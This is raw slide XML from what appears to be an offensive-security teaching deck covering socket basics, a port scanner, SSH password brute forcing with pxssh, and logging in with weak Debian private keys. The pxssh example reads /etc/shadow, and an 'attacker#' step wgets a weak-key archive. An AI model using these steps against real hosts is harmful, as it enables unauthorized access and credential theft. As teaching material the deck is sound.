              <a:t>http://pexpect.sourceforge.net/</a:t>
            </a:r>
            <a:endParaRPr sz="2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e9adf94182_2_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="33796" y="8350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latin typeface="Russo One"/>
                <a:ea typeface="Russo One"/>
                <a:cs typeface="Russo One"/>
                <a:sym typeface="Russo One"/>
              </a:rPr>
              <a:t>BUILDING A PORT SCANNER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>CONTD..</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Russo One"/>
              <a:ea typeface="Russo One"/>
              <a:cs typeface="Russo One"/>
              <a:sym typeface="Russo One"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218" name="Google Shape;218;g1e9adf94182_2_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="33801" y="2124099"/>
            <a:ext cx="11472600" cy="4333261"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="349250" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Through a series of Socket API functions, we can create, bind. listen, connect, or send traffic on TCP/IP sockets, At this point, a greater understanding of TCP/IP and sockets are needed in order to help further develop own attacks.</a:t>
            </a:r>
            <a:endParaRPr sz="2500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="349250" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Most Internet accessible applications reside on the TCP for example in a target organization, the web server might reside on ICP port so, the email server on TCP port 25, and the file transfer server on TCP port 21. To connect to any of these services in our target organization, an attacker must know both the Internet Protocol Address and the TCP port associated with the service.</a:t>
            </a:r>
            <a:endParaRPr sz="2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e9a65c21fa_1_38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="181121" y="8023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Brute forcing ssh passwords with pxssh</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="448" name="Google Shape;448;g1e9a65c21fa_1_38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="315200" y="2118350"/>
            <a:ext cx="11051700" cy="4631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400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>from</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5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>pexpect</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import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5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>pxssh</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C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>def</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send_command</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>session</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E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>cmd</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E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>session</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61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>sendline</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>cmd</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E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>session</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61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>prompt</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print</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.before.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>decode</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98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'utf-8'</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C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>def</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connect</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>host</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E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>user</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E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>password</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try</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session</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5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>pxssh</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E5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>pxssh</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session</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61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>host</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E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>user</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E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>password</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return</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session</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="E06C75"/>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except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5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Exception</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as</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e</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print</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C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'[-] Error Connecting: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</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exit</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D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>0</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400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>if</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__name__</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'__main__'</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conn</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connect</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98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'127.0.0.1'</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'root'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'toor'</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send_command</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E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>conn</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'sudo cat /etc/shadow | grep root'</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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="230221" y="8105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500"/>
              <a:t>Exploiting SSH Through Weak Private Keys</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="Google Shape;454;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680325" y="2336875"/>
            <a:ext cx="9613800" cy="4521000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-226123" lvl="0" marL="228600" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Passwords provide a method of authenticating to an SSH server but this is not the only one. Additionally. SSH provides the means to authenticate using public key cryptography. In this scenario, the server knows the public key and the user knows the private key. Using either RSA or DSA algorithms, the server produces these keys for logging into SSH. Typically, this provides an excellent method for authentication. With-the ability to generate 1024-bit, 2048-bit, or 4096 bit keys,this authentication process makes it difficult to use brute force as we did with weak passwords.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-226123" lvl="0" marL="228600" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>After downloading and extracting keys go ahead and delete the public keys,since we will only need private keys to test our connection.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="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1e9a65c21fa_6_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="230221" y="8105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Exploiting SSH Through Weak Private Keys</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="460" name="Google Shape;460;g1e9a65c21fa_6_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="124138" y="2364179"/>
            <a:ext cx="11697073" cy="35994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1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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This statement describes an alternative method of authentication to an SSH server using public key cryptography. Public key cryptography is a method of authentication that uses a pair of keys, a public key and a private key. The SSH server has the public key, and the user has the private key. When the user connects to the server, the server uses the public key to encrypt a message, and the user must use the private key to decrypt it. If the decryption is successful, the user is authenticated. This process is typically done using RSA or DSA algorithms.</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Public key cryptography is considered to be more secure than password-based authentication because it makes it difficult to use brute force attacks. The keys used in public key cryptography can be of different lengths, such as 1024-bit, 2048-bit, or 4096-bit, which makes it much harder for an attacker to guess the private key and gain access to the server.</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="461" name="Google Shape;461;g1e9a65c21fa_6_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680321" y="2047948"/>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1e9a65c21fa_6_7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="230221" y="8105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Exploiting SSH Through Weak Private Keys</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="467" name="Google Shape;467;g1e9a65c21fa_6_7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152420" y="2657384"/>
            <a:ext cx="9613800" cy="35994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sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The statement also mentions that after downloading and extracting the keys, the user should delete the public keys, since only the private keys are needed to test the connection. The private key is used to decrypt the message sent by the server, while the public key is used by the server to encrypt the message. The private key should always be kept secret and protected, while the public key can be shared with others.</a:t>
            </a:r>
            <a:endParaRPr>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1f87e024115_0_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="356146" y="1077403"/>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imes New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3500"/>
              <a:t>Exploiting SSH Through Weak Private Keys</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="474" name="Google Shape;474;g1f87e024115_0_6"/>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1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>attacker# wget https://digital offense.net/tool/debian-openssl/debian_ssh_dsa_1024_x86.tar.bz2</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>attacker# bunzip2 debian_ssh_dsa_1024-x86.tar.bz2</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
